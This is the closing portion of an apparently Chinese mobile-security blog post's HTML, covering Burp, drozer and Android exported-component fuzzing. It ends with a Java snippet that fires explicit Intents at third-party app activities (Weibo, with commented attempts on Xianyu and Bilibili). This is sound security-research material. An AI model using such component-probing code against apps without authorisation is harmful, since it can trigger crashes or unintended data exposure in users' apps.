//Toast.makeText(context, id+&quot;&quot;+img+&quot;&quot;+token, Toast.LENGTH_SHORT);	</span><br><span class="line">			&#125;</span><br><span class="line">			</span><br><span class="line">			cursor.close();</span><br><span class="line">			*/</span><br><span class="line">			//Intent v2=new Intent(&quot;com.taobao.idlefish.DATA_EXPORT&quot;);</span><br><span class="line">			Intent v2=new Intent();</span><br><span class="line">			v2.setClassName(&quot;com.sina.weibo&quot;, &quot;com.sina.weibo.xxx.xxx.xxx&quot;);</span><br><span class="line">			//v2.setClassName(&quot;tv.danmaku.bili&quot;, &quot;com.mall.ui.base.MallSigalTaskWebFragmentLoadActivity&quot;);</span><br><span class="line">			//v2.addCategory(&quot;android.intent.category.BROWSABLE&quot;);</span><br><span class="line">			//v2.putExtra(&quot;id&quot;, &quot;a&quot;);</span><br><span class="line">			//v2.putExtra(&quot;c&quot;, &quot;exportData&quot;);</span><br><span class="line">			</span><br><span class="line">			//v2.putExtra(&quot;_fragment&quot;, &quot;com.mall.base.web.MallWebFragment&quot;);</span><br><span class="line">			//v2.setData(Uri.parse(&quot;file:///storage/emulated/0/tencent/MicroMsg/Download/2.html&quot;));</span><br><span class="line">			//v2.putExtra(&quot;intent_bundle_nameintent_bundle_name&quot;,&quot;a&quot;);</span><br><span class="line">			//v2.putExtra(&quot;bundle_select_limit_num&quot;,1);</span><br><span class="line">			//v2.setData(Uri.parse(&quot;&quot;));</span><br><span class="line">			startActivity(v2);</span><br><span class="line">			//startService(v2);</span><br><span class="line">			//sendBroadcast(v2);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;);	</span><br><span class="line">	</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/2019/08/15/android/1565780462945.png" alt="1565780462945"></p>

    </div>

    
    
    
        
      

      <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/2018/12/12/pcb/" rel="next" title="鹏城杯线下总结">
                  <i class="fa fa-chevron-left"></i> 鹏城杯线下总结
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
            </div>
          </div>
        
      </footer>
    
  </div>
  
  
  
  </article>

  </div>


          </div>
          

        </div>
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">

          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">GD</p>
  <div class="site-description motion-element" itemprop="description">a GOOD pwner</div>
</div>
  <nav class="site-state motion-element">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">6</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    
  </nav>



        </div>
      </div>
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#移动安全知识总结"><span class="nav-number">1.</span> <span class="nav-text">移动安全知识总结</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#用burpsuite实现app抓包"><span class="nav-number">1.2.</span> <span class="nav-text">用burpsuite实现app抓包</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#用drozer进行app的漏洞挖掘"><span class="nav-number">1.3.</span> <span class="nav-text">用drozer进行app的漏洞挖掘</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#测试用到的各种命令"><span class="nav-number">1.4.</span> <span class="nav-text">测试用到的各种命令</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#获取包名"><span class="nav-number">1.4.1.</span> <span class="nav-text">获取包名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#获取应用的基本信息"><span class="nav-number">1.4.2.</span> <span class="nav-text">获取应用的基本信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#确定攻击面"><span class="nav-number">1.4.3.</span> <span class="nav-text">确定攻击面</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Activity"><span class="nav-number">1.4.4.</span> <span class="nav-text">Activity</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#更多具体的命令请参考下面这篇文章"><span class="nav-number">1.4.4.1.</span> <span class="nav-text">更多具体的命令请参考下面这篇文章</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#安卓的本地拒绝服务漏洞"><span class="nav-number">1.5.</span> <span class="nav-text">安卓的本地拒绝服务漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#app漏洞测试步骤"><span class="nav-number">1.6.</span> <span class="nav-text">app漏洞测试步骤</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#对activity进行fuzz自动化测试本地拒绝服务"><span class="nav-number">1.6.1.</span> <span class="nav-text">对activity进行fuzz自动化测试本地拒绝服务</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">GD</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.7.1</div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.3.0</div>

        








        
      </div>
    </footer>
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
      </div>

    

  </div>

  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

<script src="/js/utils.js?v=7.3.0"></script>
  <script src="/js/motion.js?v=7.3.0"></script>


  <script src="/js/schemes/muse.js?v=7.3.0"></script>


<script src="/js/next-boot.js?v=7.3.0"></script>




  




























  

  

  


  
  <script src="/js/scrollspy.js?v=7.3.0"></script>
<script src="/js/post-details.js?v=7.3.0"></script>


</body>
</html>
